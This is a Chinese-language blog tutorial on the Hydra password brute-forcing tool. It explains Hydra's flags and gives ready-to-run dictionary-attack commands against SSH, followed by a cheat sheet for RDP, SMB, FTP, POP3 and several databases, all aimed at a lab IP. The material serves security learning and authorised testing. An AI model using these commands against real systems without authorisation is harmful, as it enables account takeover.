Hydra密码爆破工具使用教程图文教程（超详细）_hydra使用教程

「作者简介」：CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者
「推荐专栏」：对网络安全感兴趣的小伙伴可以关注专栏《网络安全入门到精通》

Hydra也叫九头蛇，是一款开源的暴力PJ工具，集成在kali当中。

参数：

• -l 指定用户名
• -p 指定密码
• -L 指定用户名字典
• -P 指定密码字典
• -C 指定所用格式为“user:password”的字典文件
• -e
  • n null，表示尝试空密码
  • s same，把用户名本身当做密码进行尝试
  • r 反向，把用户名倒叙，当做密码进行尝试。
• -vV 显示执行细节
• -o 保存执行结果
• -s 指定非默认端口
• -M 指定破解的目标文件，如果不是默认端口，后面跟上“:port”
• -t 指定爆破时的任务数量（默认16）

一、简单使用

1）在kali中打开终端，直接输入hydra，可以看到hydra的版本、参数、以及可以爆破的协议。

从图中圈起来的地方可以看到，hydra可以爆破 http、ftp、mysql等多种协议。

二、爆破SSH

我们拿爆破SSH协议来举个栗子。

用 -l 参数指定用户名，-p参数指定密码，后面直接跟目标的IP地址和协议。

hydra -l root -p 12345678 192.168.31.173 ssh
1

成功的话，会把账号和密码高亮显示出来。

也可以使用另外一种格式：

hydra -l root -p 12345678 ssh://192.168.31.173
1

执行的结果都是一样的。

这里主要简单介绍一下用法，我知道我的SSH密码，所以就直接指定密码了。

但很多时候，我们是不知道密码的，所以就要使用密码字典来爆破。

三、使用字典爆破

小写的 -p 是指定密码，大写的 -P是指定字典文件。

hydra -l root -P 密码字典 192.168.31.173 ssh
1

1）我们先准备一个简单的密码字典，创建一个 pwd.txt 文件，在里面输入几个简单的密码：

2）然后指定这个密码字典：

hydra -l root -P pwd.txt 192.168.31.173 ssh
1

可以看到爆破成功了，但只给了一个结果：

3）如果想看爆破的过程，可以加上 -vV参数，显示执行细节：

hydra -l root -P pwd.txt 192.168.31.173 ssh -vV
1

我们的密码字典中有三个密码，它也会执行三次，并把执行过程列了出来。

4）上面的密码字典使用的是相对路径，我们也可以把它换成绝对路径：

hydra -l root -P /root/pwd.txt 192.168.31.173 ssh
1

SSH协议的默认用户是 root，所以上面我们都是指定的用户名，如果不确定用户名，就要指定用户名字典，比如下面这种格式：

hydra -L /root/usr.txt -P /root/pwd.txt 192.168.31.173 ssh
1

爆破其他协议服务时，把协议名和默认用户名换一下就可以了。

协议对应的服务名和默认密码经常会忘记，下面整理了一些常见的服务爆破格式。

四、Hydra爆破常见服务

远程桌面（RDP）

hydra -l administrator -P 密码字典 192.168.31.173 rdp
1

共享文件（SMB）

hydra -l administrator -P 密码字典 192.168.31.173 smb
1

文件传输（FTP）

hydra -l 用户名 -P 密码字典 192.168.31.173 ftp	
1

邮箱协议（POP3）

hydra -l 用户名 -P 密码字典 192.168.31.173 pop3
1

MSSQL数据库

hydra -l sa -P 密码字典 192.168.31.173 mssql
1

MySQL数据库

hydra -l 用户名 -P 密码字典 192.168.31.173 mysql
1

Oracle数据库

hydra -l 用户名 -P 密码字典 192.168.31.173 oracle
1

Redis数据库

hydra -l 用户名 -P 密码字典 192.168.31.173 redis
1

PgSQL数据库

hydra -l 用户名 -P 密码字典 192.168.31.173 postgresql
1